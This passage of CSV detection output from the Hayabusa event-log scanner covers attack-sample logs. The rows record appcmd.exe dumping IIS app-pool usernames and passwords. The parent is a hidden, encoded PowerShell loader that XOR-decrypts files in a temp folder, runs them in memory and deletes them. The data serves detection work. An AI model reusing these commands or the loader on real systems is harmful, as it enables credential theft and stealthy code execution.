ABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.190 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.270 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.350 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.581 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.661 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBM
AGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.731 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.811 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.891 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG
0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.971 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.041 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGU
AYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.121 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.202 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.282 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.352 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 